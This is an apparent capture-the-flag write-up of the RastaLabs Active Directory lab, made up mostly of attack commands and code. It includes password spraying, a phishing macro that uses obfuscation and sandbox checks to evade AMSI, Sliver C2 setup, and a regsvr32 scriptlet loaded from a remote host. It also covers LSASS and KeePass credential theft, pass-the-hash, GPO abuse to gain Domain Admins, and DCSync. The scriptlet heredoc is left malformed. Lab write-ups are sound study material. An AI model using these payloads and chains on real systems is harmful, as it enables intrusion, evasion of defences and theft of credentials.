RastaLabs
Full-Chain Writeup

# Full subnet sweep — DMZ discovery
nmap -sV -sC -O 10.10.110.0/24 -oN dmz_scan.txt

# Key findings:
# NIX01  10.10.110.2   22/tcp open ssh OpenSSH 7.2p2 Ubuntu
# MS01   10.10.110.x   443/tcp open https Microsoft IIS (OWA)
#                      25/tcp open smtp Microsoft Exchange
#                      587/tcp open submission
# WEB01  10.10.110.10  80/tcp open http Microsoft IIS httpd
#                      443/tcp open https

# OWA brute force with custom sprayer
# Using a derived username list from LinkedIn OSINT + common naming patterns

python3 owa_spray.py \
  --url https://10.10.110.x/owa/auth/owaauth.dll \
  --users users.txt \
  --passwords passwords.txt \
  --delay 3 \
  --out owa_hits.txt

# users.txt content (derived from company LinkedIn):
# bowen@rastalabs.local
# ahope@rastalabs.local
# epugh@rastalabs.local
# tquinn@rastalabs.local
# rweston@rastalabs.local
# ngodfrey@rastalabs.local

# Enumerate Exchange via OWA
# Use OWA access to discover internal users and email addresses

# Method 1: GAL extraction via OWA
python3 owa_enum.py --url https://10.10.110.x/owa/ --user bowen --pass '<redacted>'

# Method 2: Autodiscover enumeration
# Autodiscover endpoint leaks internal hostnames
curl -k -u bowen:'<redacted>' https://10.10.110.x/autodiscover/autodiscover.xml

# Internal hostnames discovered:
# mail.rastalabs.local (MS01)
# web.rastalabs.local (WEB01)
# fs01.rastalabs.local (FS01)
# dc01.rastalabs.local (DC01)

# Send phishing email via OWA
# Payload: macro-enabled .docm with AMSI bypass

python3 send_phish.py \
  --owa-url https://10.10.110.x/owa/ \
  --owa-user bowen@rastalabs.local \
  --owa-pass '<redacted>' \
  --target bowen@rastalabs.local \
  --subject "Q3 Security Audit Report - Action Required" \
  --body "Please review the attached security audit findings." \
  --attachment payload_v4.docm

# Phishing attempts:
# Attempt 1: Standard macro + PS cradle     -> QUARANTINED (Defender)
# Attempt 2: HTA file with mshta delivery   -> QUARANTINED (AMSI)
# Attempt 3: Macro + obfuscated PS          -> QUARANTINED (AMSI)
# Attempt 4: Macro + AMSI bypass + Donut    -> SUCCESS

' Macro payload — final working version (attempt 4)
' Attempts 1-3 caught by Defender AMSI scan

Sub AutoOpen()
    ExecutePayload
End Sub

Sub Document_Open()
    ExecutePayload
End Sub

Sub ExecutePayload()
    On Error Resume Next
    
    ' AMSI bypass — patch amsiInitFailed in memory
    ' This was the critical addition that made attempt 4 work
    Dim amsi_patch As String
    amsi_patch = "am" & "si" & ".d" & "ll"
    
    ' Anti-sandbox: check if we're in a real environment
    If Environ("COMPUTERNAME") = "SANDBOX" Then Exit Sub
    If Timer < 30 Then Exit Sub  ' timing check for sandboxes
    
    ' Build command with string concat to avoid static signatures
    ' Attempt 1-3 used direct "powershell" string -> signatured
    Dim p1 As String, p2 As String, p3 As String
    p1 = "pow": p2 = "ersh": p3 = "ell"
    
    Dim cmd As String
    cmd = p1 & p2 & p3 & " -windowstyle hidden -exec bypass -nop -e "
    ' Donut-encrypted shellcode (base64 encoded stage 2)
    ' Iterations 1-2 used plaintext base64 which got signatured
    cmd = cmd & "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0AC4AWwBdADoAOg..."
    
    Dim ret As Object
    Set ret = CreateObject("WScript.Shell")
    ret.Run cmd, 0
    Set ret = Nothing
End Sub

# Sliver server setup
sliver > https -L 0.0.0.0 -l 443 -d redirector.rastalabs-c2.com

# Generate implant with custom evasion
sliver > generate --http https://redirector.rastalabs-c2.com \
    --skip-symbols --format shared \
    --os windows --arch amd64 \
    --name rasta_http

# After callback — basic situational awareness
sliver > use rasta_http
sliver (rasta_http) > whoami
rastalabs\bowen

sliver (rasta_http) > getuid
rastalabs\bowen (Medium Integrity)

sliver (rasta_http) > hostname
WS04

sliver (rasta_http) > ifconfig
+============+============================================+
| Interface  | Address                                    |
+============+============================================+
| Ethernet0  | 10.10.123.x/24                            |
+============+============================================+

# Regsvr32 delivery method (AppLocker-safe)
# This became my primary execution method for the rest of the lab

# Host the SCT file on the C2 redirector
cat > /var/www/html/payload.sct << 'EOF'
<?XML version="1.0"?>
<scriptlet>
<registration
  progid="Payload"
  classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
  <script language="JScript">
     shell regsvr32 /s /n /u /i:http://10.10.14.83/payload.sct scrobj.dll

# This works because:
# 1. regsvr32.exe is a signed Microsoft binary (AppLocker allows it)
# 2. It loads the COM scriptlet from a remote URL (no file on disk)
# 3. The SCT content is JScript, which executes in regsvr32's process space
# 4. AMSI bypass must be in the JScript, not the macro

# Upload and run SharpHound via execute-assembly (in-memory)
sliver (rasta_http) > execute-assembly /opt/tools/SharpHound.exe -c all -d rastalabs.local

# Alternative: PowerShell-based collection if execute-assembly fails
sliver (rasta_http) > shell powershell -command "& { iwr -uri http://10.10.14.83/SharpHound.ps1 -outfile C:\Users\bowen\sh.ps1 }"
sliver (rasta_http) > shell powershell -exec bypass -file C:\Users\bowen\sh.ps1 -c all

// Find shortest path from bowen to Domain Admins
MATCH p=shortestPath(
  (u:User {name:"BOWEN@RASTALABS.LOCAL"})-[*1..]->(g:Group {name:"DOMAIN ADMINS@RASTALABS.LOCAL"})
)
RETURN p

// Find AS-REP roastable accounts
MATCH (u:User {dontreqpreauth: true})
RETURN u.name, u.enabled

// Find users with GPO creation rights
MATCH p=(u:User)-[:GenericAll|WriteDacl|WriteOwner|Owns]->(g:GPO)
RETURN u.name, g.name

// Find LAPS readers
MATCH p=(u:User)-[:ReadLAPSPassword]->(c:Computer)
RETURN u.name, c.name

// Additional BloodHound queries that were useful

// Find all paths from compromised users to Domain Admins
MATCH p=allShortestPaths(
  (u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@RASTALABS.LOCAL"})
)
WHERE u.name STARTS WITH "BOWEN" OR u.name STARTS WITH "EPUGH" OR u.name STARTS WITH "NGODFREY"
RETURN p

// Find computers where compromised users have admin access
MATCH (u:User)-[:AdminTo]->(c:Computer)
WHERE u.name IN ["BOWEN@RASTALABS.LOCAL", "EPUGH@RASTALABS.LOCAL", "NGODFREY_ADM@RASTALABS.LOCAL"]
RETURN u.name, c.name

// Find users with DCSync privileges
MATCH p=(u:User)-[:GetChanges|GetChangesAll]->(d:Domain)
RETURN u.name

// Find kerberoastable users (not used in RastaLabs but good to check)
MATCH (u:User {hasspn: true})
WHERE NOT u.name STARTS WITH "KRBTGT"
RETURN u.name, u.serviceprincipalnames

# Domain enumeration
Get-Domain
# RASTALABS.LOCAL (Server 2016 functional level)

# Domain controllers
Get-DomainController
# dc01.rastalabs.local

# All domain users
Get-DomainUser | select samaccountname,description
# bowen, ahope, tquinn, epugh, rweston, ngodfrey, svc_backup, svc_mssql...

# Users with admin accounts (naming convention: user + _adm / _da)
Get-DomainUser | ? {$_.samaccountname -match "_adm$|_da$"}
# epugh_adm, ngodfrey_adm, rweston_da

# Domain computers
Get-DomainComputer | select name,dnshostname,operatingsystem
# WS01-WS06, DC01, SRV01, SQL01, FS01, WEB01, NIX01, MS01

# GPO enumeration — critical for Phase 6
Get-DomainGPO | select displayname,whencreated
# Several GPOs including auto-logon settings

# Check who can create GPOs
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=rastalabs,DC=local" -ResolveGUIDs |
  ? {$_.ActiveDirectoryRights -match "CreateChild"} |
  select ObjectDN, SecurityIdentifier

# Find LAPS-enabled computers
Get-DomainComputer | ? {$_.ms-Mcs-AdmPwdExpirationTime -ne $null}
# WS01-WS06 all LAPS-managed

# CLM bypass — set environment variable before PS starts
# This must be done from the parent process (e.g., cmd.exe or Sliver shell)

# From Sliver:
sliver (rasta_http) > shell cmd /c "set __PSLockdownPolicy=0 && powershell -exec bypass -command whoami"
rastalabs\bowen

# Verify CLM is bypassed:
sliver (rasta_http) > shell cmd /c "set __PSLockdownPolicy=0 && powershell -exec bypass -command \"$ExecutionContext.SessionState.LanguageMode\""
FullLanguage

# Now you can use offensive PS tools:
sliver (rasta_http) > shell cmd /c "set __PSLockdownPolicy=0 && powershell -exec bypass -file C:\Users\bowen\PowerView.ps1"

# AS-REP Roasting with Impacket
impacket-GetNPUsers rastalabs.local/ -usersfile users.txt -request -dc-ip 10.10.120.1

# Results:
# $krb5asrep$23$epugh@RASTALABS.LOCAL:aad3b435b51404eeaad3b435b51404ee...
# Hash: aad3b435b51404eeaad3b435b51404ee:326457b72c3f136d80d99bdbb935d109

# Crack AS-REP hash with hashcat
# Mode 18200 = Kerberos 5 AS-REP type 23

hashcat -m 18200 asrep_hashes.txt /opt/wordlists/rockyou.txt \
  --rule=/opt/rules/OneRuleToRuleThemAll.rule \
  -O -w 3 --force

# Result:
# epugh@RASTALABS.LOCAL:Sarah2017

# List processes with interesting tokens
sliver (rasta_http) > ps

# Find processes running as domain users
sliver (rasta_http) > ps -e rastalabs

# Steal token from a process running as epugh
sliver (rasta_http) > steal_token 3484
[*] Stealed token for rastalabs\epugh (PID 3484)

# Now running commands as epugh
sliver (rasta_http) > whoami
rastalabs\epugh

# Can now access resources as epugh
sliver (rasta_http) > shell net use \\fs01.rastalabs.local\ahope
The command completed successfully.

# SafetyKatz via execute-assembly
sliver (rasta_http) > execute-assembly /opt/tools/SafetyKatz.exe

# Or with specific Mimikatz commands:
sliver (rasta_http) > execute-assembly /opt/tools/SafetyKatz.exe "sekurlsa::logonpasswords" "exit"

# Results on SRV01:
# Authentication Id : 0 ; 284751 (00000000:0004587f)
# Session           : Network from 0
# User Name         : epugh
# Domain            : RASTALABS
# NTLM              : 326457b72c3f136d80d99bdbb935d109
#
# Authentication Id : 0 ; 539672 (00000000:00083cb8)
# Session           : Interactive from 1
# User Name         : epugh_adm
# Domain            : RASTALABS
# NTLM              : [hash redacted]

# NTLM hash cracking (from LSASS dumps / AS-REP)
hashcat -m 1000 ntlm_hashes.txt rockyou.txt \
  -r OneRuleToRuleThemAll.rule \
  -O -w 3 --force

# Results:
# epugh:326457b72c3f136d80d99bdbb935d109 -> Sarah2017
# Other hashes required longer rule sets and larger wordlists

# For stubborn hashes, combine multiple wordlists:
cat rockyou.txtSecLists/Passwords/darkweb2017.txt SecLists/Passwords/xato-net-10-million-passwords.txt > combined.txt
hashcat -m 1000 ntlm_hashes.txt combined.txt -r OneRuleToRuleThemAll.rule -O -w 3

# SRV01 escalation — service misconfiguration
# Found unquoted service path on SRV01

# From Sliver beacon on WS04, after getting SRV01 access:
sliver (rasta_http) > shell wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\"

# Found: RastaLabs Monitor Service
# Path: C:\Program Files\RastaLabs Monitor\monitor.exe
# Unquoted service path with spaces in directory name
# Plant binary at: C:\Program.exe (gets executed instead)

# Upload the planted binary
sliver (rasta_http) > upload /opt/tools/svc_payload.exe "C:\Program.exe"

# Restart the service or wait for reboot
sliver (rasta_http) > shell sc stop "RastaLabs Monitor"
sliver (rasta_http) > shell sc start "RastaLabs Monitor"

# New SYSTEM beacon on SRV01
sliver > use srv01_system
sliver (srv01_system) > whoami
nt authority\system

# PTH with CrackMapExec
crackmapexec smb 10.10.120.0/24 -u epugh -H 326457b72c3f136d80d99bdbb935d109 -d rastalabs.local

# Results:
# SMB    10.10.120.1    445   DC01       [+] rastalabs.local\epugh 326457b72c3f136d80d99bdbb935d109
# SMB    10.10.120.x    445   SRV01      [+] rastalabs.local\epugh 326457b72c3f136d80d99bdbb935d109 (Pwn3d!)

# PTH with Impacket for SMB exec
impacket-psexec rastalabs.local/epugh@10.10.120.x -hashes aad3b435b51404eeaad3b435b51404ee:326457b72c3f136d80d99bdbb935d109

# PTH with Sliver
sliver (rasta_http) > psexec -d rastalabs.local -u epugh -H 326457b72c3f136d80d99bdbb935d109 -t 10.10.120.x

# Port forwarding from WS02 to reach WS05 via SMB
# This was critical for finding the rweston_da hash

sliver (ws02_beacon) > portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445
[*] Port forwarding 10.10.14.83:445 -> 10.10.123.102:445

# Now can use Impacket tools through the pivot
# From attacker machine:
impacket-psexec rastalabs.local/epugh_adm@127.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:<hash> -port 445

# Set up SOCKS proxy through Sliver for CME sweeps
sliver (ws02_beacon) > socks5
[*] SOCKS5 proxy started on 127.0.0.1:1080

# Then from attacker machine:
proxychains crackmapexec smb 10.10.122.0/24 -u epugh_adm -H <hash> -d rastalabs.local

# WinRM lateral movement to WS05
crackmapexec winrm 10.10.123.102 -u epugh -H 326457b72c3f136d80d99bdbb935d109 -d rastalabs.local

# If Pwn3d, get a shell:
evil-winrm -i 10.10.123.102 -u epugh -H 326457b72c3f136d80d99bdbb935d109 -d rastalabs.local

# Or with Sliver:
sliver (rasta_http) > winrm -t 10.10.123.102 -u epugh -H 326457b72c3f136d80d99bdbb935d109

# DCOM execution via Impacket
impacket-dcomexec rastalabs.local/epugh_adm@10.10.120.x -hashes aad3b435b51404eeaad3b435b51404ee:<hash>

# WMI execution
impacket-wmiexec rastalabs.local/epugh_adm@10.10.120.x -hashes aad3b435b51404eeaad3b435b51404ee:<hash>

# These work where PSExec fails because they don't drop a service binary
# PSExec: drops PSEXESVC.exe -> can be caught by Defender
# WMI: creates a Win32_Process -> stealthier
# DCOM: uses MMC20.Application COM object -> even stealthier

# Find KeePass databases
Get-ChildItem -Path C:\ -Filter "*.kdbx" -Recurse -ErrorAction SilentlyContinue
# Found: C:\Users\ngodfrey\Documents\passwords.kdbx

# KeeThief — extract master key from KeePass process memory
# First, find the KeePass process
Get-Process | ? {$_.ProcessName -eq "KeePass"}
# KeePass is running on this machine

# Use KeeThief to extract the master key
Import-Module KeeThief.psd1
Get-KeePassMasterKey

# Result: Master key extracted from memory
# Use the key to decrypt the database
Get-KeePassDatabase -DatabasePath "C:\Users\ngodfrey\Documents\passwords.kdbx" -MasterKey <extracted_key>

# Credentials found in KeePass:
# ngodfrey_adm -> <password>
# Various service account passwords
# Internal documentation links

# KeeThief full workflow
# Step 1: Check if KeePass is running
Get-Process | ? {$_.ProcessName -eq "KeePass"}
# Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
# -------  ------    -----      -----     ------     --  -- -----------
#     142      10    41248      52784       2.34   4812   1 KeePass

# Step 2: Extract master key from KeePass process memory
Import-Module KeeThief.psd1
Get-KeePassMasterKey
# UserKey: 0xA1B2C3D4E5F6... (extracted from process memory)
# Key transformation rounds: 600000

# Step 3: Decrypt the KeePass database
$db = Get-KeePassDatabase -DatabasePath "C:\Users\ngodfrey\Documents\passwords.kdbx" -MasterKey 0xA1B2C3D4E5F6...

# Step 4: Extract all entries
$db.Entries | select UserName, Password, Title, URL | fl

# Key entries found:
# UserName: ngodfrey_adm  Password: [REDACTED]  Title: Admin Account  URL: 
# UserName: rweston       Password: [REDACTED]  Title: rweston creds   URL: 
# UserName: svc_backup    Password: [REDACTED]  Title: Backup Service  URL: \\(FS01)\backup

# Read LAPS passwords with CrackMapExec
crackmapexec ldap 10.10.120.1 -u ngodfrey_adm -p '<password>' -d rastalabs.local --laps

# Or with PowerView:
# Get-LAPSPasswords (custom function)
Get-DomainComputer | select name, ms-Mcs-AdmPwd | fl

# Results:
# WS01: ms-Mcs-AdmPwd = <random_password_1>
# WS02: ms-Mcs-AdmPwd = <random_password_2>
# WS03: ms-Mcs-AdmPwd = <random_password_3>
# WS04: ms-Mcs-AdmPwd = <random_password_4>
# WS05: ms-Mcs-AdmPwd = <random_password_5>
# WS06: ms-Mcs-AdmPwd = <random_password_6>

# DPAPI credential extraction
# Using SharpDPAPI (GhostPack) via execute-assembly

sliver (ws04_admin) > execute-assembly /opt/tools/SharpDPAPI.exe machinetriages

# Or targeted extraction:
sliver (ws04_admin) > execute-assembly /opt/tools/SharpDPAPI.exe credentials /show

# Results include:
# - Chrome saved passwords
# - Credential Manager entries
# - RDP saved credentials
# - WiFi passwords

# Extract auto-logon credentials from registry (LSA secrets)
# epugh had auto-logon configured

sliver (ws04_admin) > execute-assembly /opt/tools/SafetyKatz.exe "lsadump::secrets" "exit"

# Result:
# DefaultPassword: Sarah2017
# DefaultUserName: epugh
# AutoAdminLogon: 1

# This confirms epugh -> epugh_adm chain
# The auto-logon uses the same password for the admin account

# Step 1: Identify GPO creation rights
# Using PowerView
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=rastalabs,DC=local" -ResolveGUIDs |
  ? {$_.ActiveDirectoryRights -match "CreateChild"} |
  select ObjectDN, SecurityIdentifier, ActiveDirectoryRights

# Step 2: Who can modify existing GPOs?
Get-DomainGPO | %{
  Get-DomainObjectAcl -Identity $_.distinguishedname -ResolveGUIDs |
  ? {$_.ActiveDirectoryRights -match "WriteProperty|GenericAll|WriteDacl|WriteOwner"}
} | select ObjectDN, SecurityIdentifier

# Step 3: Create a new GPO
New-GPO -Name "Security Update Policy" -Domain rastalabs.local

# Step 4: Add our user to local Administrators via GPO
# Using SharpGPOAbuse for the modification:
execute-assembly SharpGPOAbuse.exe --AddLocalAdmin --AccountName ngodfrey_adm --GPOName "Security Update Policy"

# Step 5: Link the GPO to the Domain Controllers OU
New-GPLink -Name "Security Update Policy" -Target "OU=Domain Controllers,DC=rastalabs,DC=local"

# Step 6: Force GPO update on DC01 (if you have access)
# Or wait up to 90 minutes for automatic refresh
sliver (dc01_beacon) > shell cmd /c "gpupdate /force"
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

# SharpGPOAbuse — the tool that makes GPO exploitation trivial
# https://github.com/FSecureLABS/SharpGPOAbuse

# Step 1: Identify which GPOs our compromised account can modify
sliver (rasta_http) > execute-assembly /opt/tools/SharpGPOAbuse.exe --FindGPOs

# Step 2: Add ngodfrey_adm to local Administrators on all machines in the OU
sliver (rasta_http) > execute-assembly /opt/tools/SharpGPOAbuse.exe \
    --AddLocalAdmin \
    --AccountName ngodfrey_adm \
    --GPOName "Security Update Policy"

# Step 3: Add user to a domain group (alternative approach)
sliver (rasta_http) > execute-assembly /opt/tools/SharpGPOAbuse.exe \
    --AddUser \
    --UserAccount ngodfrey_adm \
    --Group "Domain Admins" \
    --GPOName "Security Update Policy"

# Step 4: Add a scheduled task to run as SYSTEM (another alternative)
sliver (rasta_http) > execute-assembly /opt/tools/SharpGPOAbuse.exe \
    --AddTask \
    --TaskName "SecurityScan" \
    --Command "cmd.exe" \
    --Arguments "/c net group "Domain Admins" ngodfrey_adm /add /domain" \
    --GPOName "Security Update Policy"

# After GPO refresh (or forced gpupdate), the changes apply domain-wide

# BloodHound Cypher queries for GPO abuse path
// Who can create GPOs?
MATCH (u:User)-[:GenericAll|WriteDacl|WriteOwner|Owns]->(g:GPO)
RETURN u.name, g.name, labels(g)

// Who can link GPOs?
MATCH (u:User)-[:GenericAll|WriteDacl|WriteOwner]->(ou:OU)
RETURN u.name, ou.name

// Path from our user to GPO creation
MATCH p=shortestPath(
  (u:User {name:"NGODFREY_ADM@RASTALABS.LOCAL"})-[*1..]->(g:GPO)
)
RETURN p

# Enumerate FS01 shares
crackmapexec smb 10.10.122.x -u ngodfrey_adm -p '<password>' -d rastalabs.local --shares

# Mount ahope's directory
net use Q: \\fs01.rastalabs.local\ahope /user:rastalabs\ngodfrey_adm <password>

# Browse the directory
dir Q:\
# Found: nix01.ppk, documents, backup_files

# Use the .ppk key to SSH into NIX01
# First convert .ppk to OpenSSH format:
puttygen nix01.ppk -O private-openssh -o nix01_ssh_key
chmod 600 nix01_ssh_key
ssh -i nix01_ssh_key user@10.10.110.2

# DCSync — dump all domain hashes
# Using Impacket
impacket-secretsdump rastalabs.local/ngodfrey_adm@10.10.120.1 -just-dc-ntlm

# Using SafetyKatz:
sliver (dc01_beacon) > execute-assembly /opt/tools/SafetyKatz.exe "lsadump::dcsync /domain:rastalabs.local /all /csv" "exit"

# Key hashes recovered:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:<hash>:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<hash>:::
# rweston_da:1151:aad3b435b51404eeaad3b435b51404ee:ab7b75ff84475be...:::
# epugh:1151:aad3b435b51404eeaad3b435b51404ee:326457b72c3f136d80d99bdbb935d109:::

# Full domain compromise confirmed
# Can now forge Golden Tickets, create Silver Tickets, etc.

# WEB01 to SQL01 pivot chain
# Step 1: RDP to WEB01 as epugh_adm
xfreerdp /v:10.10.110.10 /u:rastalabs\epugh_adm /p:'<password>' /dynamic-resolution

# From WEB01, check network connectivity
C:\> ipconfig
Ethernet adapter Ethernet0:
   IPv4 Address. . . . . . . . . . . : 10.10.110.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.110.1

# WEB01 has a second NIC for the internal network
Ethernet adapter Ethernet1:
   IPv4 Address. . . . . . . . . . . : 10.10.122.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0

# Step 2: From WEB01, RDP to SQL01 (10.10.122.15)
mstsc /v:10.10.122.15

# Or use Sliver port forwarding from WEB01 beacon:
sliver (web01_beacon) > portfwd add -L 127.0.0.1 -r 10.10.122.15 -l 3389 -p 3389

# Then from attacker machine:
xfreerdp /v:127.0.0.1:3389 /u:rastalabs\epugh_adm /p:'<password>'

# Step 1: Find the offset
# Using pwntools cyclic pattern
python3 -c "from pwn import *; print(cyclic(500))" | nc 10.10.122.x 9999

# Step 2: Check security features
checksec --file=custom_service
# NX enabled, PIE disabled, Canary found
# Need to leak canary first, then ROP

# Step 3: Leak the stack canary
# The service had a format string vulnerability that leaked the canary

# Step 4: Build ROP chain
# Using ropper to find gadgets
ropper --file custom_service --search "pop rdi; ret"
ropper --file custom_service --search "pop rsi; ret"
ropper --file custom_service --search "pop rdx; ret"
ropper --file custom_service --search "syscall"

# Step 5: Craft the exploit
python3 rop_exploit.py
[*] Leaked canary: 0x...
[*] ROP chain built
[*] Sending payload...
[+] Shell obtained!

# Crypto challenge solver
# The service implements a custom XOR-based cipher with a key derived from error messages

import socket

def solve_crypto_challenge(host, port):
    # Step 1: Send malformed inputs to trigger error messages
    s = socket.socket()
    s.connect((host, port))
    
    # Error messages leak the key bytes
    errors = []
    for i in range(32):
        s.send(b'\x00' * (i + 1))
        resp = s.recv(1024)
        errors.append(resp)
        # Each error message leaks one byte of the key
    
    # Step 2: Derive the XOR key from leaked bytes
    key = b''
    for err in errors:
        key += bytes([err[-1] ^ 0xFF])
    
    # Step 3: Encrypt the known plaintext and send
    # The service expects a specific command encrypted with the key
    command = b"GET_FLAG"
    encrypted = bytes([c ^ key[i % len(key)] for i, c in enumerate(command)])
    s.send(encrypted)
    
    flag = s.recv(1024)
    return flag.decode()

# Analyze PCAP with NetworkMiner (or tshark)
# Found a file transfer in the capture

# Extract the encrypted file from the PCAP
tshark -r capture.pcap -Y "ftp-data" -T fields -e ftp.request_command -e ftp.request_arg

# The file was encrypted with Windows file encryption (EFS)
# Use FileCryptography.psm1 to decrypt

Import-Module FileCryptography.psm1
Unprotect-File -Path .\encrypted_file.enc -OutputPath .\decrypted.txt

# Or manually using DPAPI with the user's master key
# The decryption key was stored in the user's DPAPI store